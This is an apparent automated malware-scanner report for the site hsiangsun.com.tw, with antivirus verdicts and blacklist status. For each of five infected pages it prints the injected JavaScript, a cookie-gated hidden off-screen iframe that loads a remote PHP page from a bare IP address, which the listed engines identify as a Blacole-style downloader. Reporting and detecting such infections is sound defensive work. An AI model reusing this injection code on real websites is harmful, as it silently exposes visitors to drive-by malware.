New scan:

Malware Scanner report for hsiangsun.com.tw

Malicious/Suspicious/Total urls checked
5/0/15
5 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "hsiangsun.com.tw" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=hsiangsun.com.tw

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.hsiangsun.com.tw/
200 OK
Content-Length: 38836
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function ited09() { var static='ajax'; var controller='index.php'; var ited = document.createElement('iframe'); ited.src = 'http://69.161.130.183/rel.php'; ited.style.position = 'absolute'; ited.style.color = '45'; ited.style.height = '45px'; ited.style.width = '45px'; ited.style.left = '100045'; ited.style.top = '100045'; if (!document.getElementById('ited')) { document.write('<p id=\'ited\' class=\'ited09\' ></p>'); document.getElementById('ited').appendChild(ited);
... 372 bytes are skipped ...
t = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); ited09(); } }

Antivirus reports:

Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
Emsisoft
JS:Trojan.Script.CIV (B)
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Blacole.XE
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.hsiangsun.com.tw/index.php?Act=3000&w_id=d8cf84a67c44171c321735f7808060b1
200 OK
Content-Length: 75656
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function ited09() { var static='ajax'; var controller='index.php'; var ited = document.createElement('iframe'); ited.src = 'http://69.161.130.183/rel.php'; ited.style.position = 'absolute'; ited.style.color = '45'; ited.style.height = '45px'; ited.style.width = '45px'; ited.style.left = '100045'; ited.style.top = '100045'; if (!document.getElementById('ited')) { document.write('<p id=\'ited\' class=\'ited09\' ></p>'); document.getElementById('ited').appendChild(ited);
... 372 bytes are skipped ...
t = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); ited09(); } }

Antivirus reports:

Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
Emsisoft
JS:Trojan.Script.CIV (B)
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Blacole.XE
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.hsiangsun.com.tw/index.php?Act=3000&w_id=156937295da8497eeee6d211890de2a0
200 OK
Content-Length: 30800
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function ited09() { var static='ajax'; var controller='index.php'; var ited = document.createElement('iframe'); ited.src = 'http://69.161.130.183/rel.php'; ited.style.position = 'absolute'; ited.style.color = '45'; ited.style.height = '45px'; ited.style.width = '45px'; ited.style.left = '100045'; ited.style.top = '100045'; if (!document.getElementById('ited')) { document.write('<p id=\'ited\' class=\'ited09\' ></p>'); document.getElementById('ited').appendChild(ited);
... 372 bytes are skipped ...
t = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); ited09(); } }

Antivirus reports:

Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
Emsisoft
JS:Trojan.Script.CIV (B)
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Blacole.XE
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.hsiangsun.com.tw/index.php?Act=3000&w_id=2625705537034693cbcbcf8bda7deca5
200 OK
Content-Length: 33109
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function ited09() { var static='ajax'; var controller='index.php'; var ited = document.createElement('iframe'); ited.src = 'http://69.161.130.183/rel.php'; ited.style.position = 'absolute'; ited.style.color = '45'; ited.style.height = '45px'; ited.style.width = '45px'; ited.style.left = '100045'; ited.style.top = '100045'; if (!document.getElementById('ited')) { document.write('<p id=\'ited\' class=\'ited09\' ></p>'); document.getElementById('ited').appendChild(ited);
... 372 bytes are skipped ...
t = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); ited09(); } }

Antivirus reports:

Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
Emsisoft
JS:Trojan.Script.CIV (B)
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Blacole.XE
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.hsiangsun.com.tw/index_p.php?Act=9020
200 OK
Content-Length: 11600
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function ited09() { var static='ajax'; var controller='index.php'; var ited = document.createElement('iframe'); ited.src = 'http://69.161.130.183/rel.php'; ited.style.position = 'absolute'; ited.style.color = '45'; ited.style.height = '45px'; ited.style.width = '45px'; ited.style.left = '100045'; ited.style.top = '100045'; if (!document.getElementById('ited')) { document.write('<p id=\'ited\' class=\'ited09\' ></p>'); document.getElementById('ited').appendChild(ited);
... 372 bytes are skipped ...
t = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); ited09(); } }

Antivirus reports:

Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
Emsisoft
JS:Trojan.Script.CIV (B)
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Blacole.XE
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.hsiangsun.com.tw/online_card/tip.js
200 OK
Content-Length: 6619
Content-Type: application/x-javascript
clean
http://www.hsiangsun.com.tw/page1.php
200 OK
Content-Length: 23613
Content-Type: text/html
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
200 OK
Content-Length: 72174
Content-Type: text/javascript
clean
http://www.hsiangsun.com.tw/photo_show/fadeslideshow.js
200 OK
Content-Length: 14223
Content-Type: application/x-javascript
clean
http://www.hsiangsun.com.tw/page2.php
200 OK
Content-Length: 48065
Content-Type: text/html
clean
http://www.hsiangsun.com.tw/page3.php
200 OK
Content-Length: 45972
Content-Type: text/html
clean
http://www.hsiangsun.com.tw/index_a.php?Act=8330
200 OK
Content-Length: 27204
Content-Type: text/html
clean
http://www.hsiangsun.com.tw/page4.php
200 OK
Content-Length: 29736
Content-Type: text/html
clean
http://www.hsiangsun.com.tw/page10.php
200 OK
Content-Length: 44838
Content-Type: text/html
clean
http://www.hsiangsun.com.tw/index_a.php?Act=8200
200 OK
Content-Length: 23763
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: hsiangsun.com.tw

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hsiangsun.com.tw
Referer: http://www.google.com/search?q=hsiangsun.com.tw

Result:
The result is similar to the first query. There are no suspicious redirects found.